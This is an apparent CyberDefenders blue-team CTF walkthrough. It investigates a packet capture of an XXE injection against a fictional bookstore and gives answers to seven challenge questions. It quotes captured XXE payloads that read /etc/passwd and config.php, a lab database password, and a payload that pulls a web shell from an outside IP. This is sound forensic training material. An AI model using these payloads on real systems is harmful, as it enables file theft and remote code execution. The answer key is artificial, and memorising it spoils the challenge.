# XXE Infiltration
> Walkthrough
+ categories: [traffic-analysis, malicious traffic]
+ source: [CybersDefenderos](https://cyberdefenders.org/blueteam-ctf-challenges/xxe-infiltration/)

## Overview
You are a cybersecurity analyst at PageTurner, a famous online bookstore. An automated alert has detected unusual XML data being processed by the server, indicating a potential XXE (XML External Entity) Injection attack. This raises concerns about the integrity of PageTurner's customer data and internal systems, prompting an immediate investigation.

As the lead analyst in this case, you must analyze the network traffic to uncover the nature of the suspicious activity. Your objectives include identifying the attack vector, assessing the scope of any potential data breach, and determining if the attacker gained further access to PageTurner's internal systems.

---

**Q1** Knowing which open ports have been discovered by the attacker allows us to understand which services are exposed and potentially targeted. Can you provide the highest numbered port open on the victim web server?    
**A** 3306    

**Q2** By identifying the vulnerable PHP script, security teams can directly address and mitigate the vulnerability. What's the complete URI of the PHP script vulnerable to XXE Injection?    
**A** /review/upload.php

**Q3** To construct the attack timeline and determine the initial point of compromise. What's the name of the first malicious XML file uploaded by the attacker?    
**A:**    
Packet ID: `88316	2024-05-31 11:57:03	210.106.114.183	53146	50.239.151.185	80	HTTP/XML	pageturner4books.net	POST /review/upload.php HTTP/1.1`       
File name: 'TheGreatGatsby.xml'  
File contents:  
``` shell
Encapsulated multipart part:  (text/xml)
    Content-Disposition: form-data; name="file"; filename="TheGreatGatsby.xml"\r\n
    Content-Type: text/xml\r\n\r\n
    eXtensible Markup Language
        <?xml
        <!DOCTYPE foo [
            <!ELEMENT foo ANY >
            <!ENTITY xxe SYSTEM "file:///etc/passwd" >
            ]>
        <foo>
            &xxe;
        </foo>
```

**Q4** Understanding which sensitive files were accessed helps evaluate the breach's potential impact. What's the name of the web app configuration file the attacker read?       
**A:**    
Packet ID:`88338	2024-05-31 12:03:12	50.239.151.185	80	210.106.114.183	34362	HTTP/XML		HTTP/1.1 200 OK `   
File name: 'file:///var/www/html/config.php'  
File contents:    
``` shell
    Encapsulated multipart part:  (text/xml)
        Content-Disposition: form-data; name="file"; filename="ToKillaMockingbird.xml"\r\n    
        Content-Type: text/xml\r\n\r\n
        eXtensible Markup Language
            <?xml
            <!DOCTYPE foo [
                <!ELEMENT foo ANY >
                <!ENTITY xxe SYSTEM "file:///var/www/html/config.php" >
                ]>
            <foo>
                &xxe;
                </foo>
    Last boundary: \r\n-----------------------------29815109738042074311830864671--\r\n
```
``` xml
    [HTTP response 1/1]
    [Time since request: 0.001229000 seconds]
    [Request in frame: 88336]
    [Request URI: http://pageturner4books.net/review/upload.php]
    Content-encoded entity body (gzip): 299 bytes -> 401 bytes
    File Data: 401 bytes
eXtensible Markup Language
    <?xml
    <!DOCTYPE foo [
        <!ELEMENT foo ANY>
        <!ENTITY xxe SYSTEM "file:///var/www/html/config.php">
        ]>
    <foo>
        Unrecognized text
            [Expert Info (Warning/Protocol): Unrecognized text]
         [truncated]$db_host = 'localhost';\n$db_name = 'pageturner';\n$db_user = 'webuser';\n$db_pass = 'Winter2024';\n\n$conn = new mysqli($db_host, $db_user, $db_pass, $db_name);\n\nif ($conn->connect_error) {\n    die("Connection failed: " . $
        </foo>
```

**Q5**: Determining the extent of the breach, what's the password of the compromised database user?   
**A**: 'Winter2024'  

**Q6**: Following the database user compromise. What's the UTC timestamp of the attacker's first connection with the MySQL server? 
**A**: '2024-05-31 12:08:49'   
Packet ID: `88346	2024-05-31 12:08:49	50.239.151.185	3306	210.106.114.183	44984	MySQL		Server Greeting  proto=10 version=8.0.36-2ubuntu3`  

**Q7**: To eradicate the threat and prevent further unauthorized access, can you identify the name of the web shell the attacker uploaded for remote code execution and persistence?  
**A**: 'booking.php'   

Packet ID: `88410	2024-05-31 12:15:42	210.106.114.183	52266	50.239.151.185	80	HTTP/XML	pageturner4books.net	POST /review/upload.php HTTP/1.1 `  
File contents:  
``` xml
MIME Multipart Media Encapsulation, Type: multipart/form-data, Boundary: "---------------------------18054287528629841081753868852"
    [Type: multipart/form-data]
    First boundary: -----------------------------18054287528629841081753868852\r\n
    Encapsulated multipart part:  (text/xml)
        Content-Disposition: form-data; name="file"; filename="PrideandPrejudice.xml"\r\n
        Content-Type: text/xml\r\n\r\n
        eXtensible Markup Language
            <?xml
            <!DOCTYPE foo [
                <!ELEMENT foo ANY >
                <!ENTITY % payload SYSTEM "http://203.0.113.15/booking.php">
                <!ENTITY % internals "<!ENTITY file SYSTEM 'php://filter/read=convert.base64-encode/resource=%payload;'>
                ">]>\n
                <foo>
                    &file;
                    </foo>
    Last boundary: \r\n-----------------------------18054287528629841081753868852--\r\n
```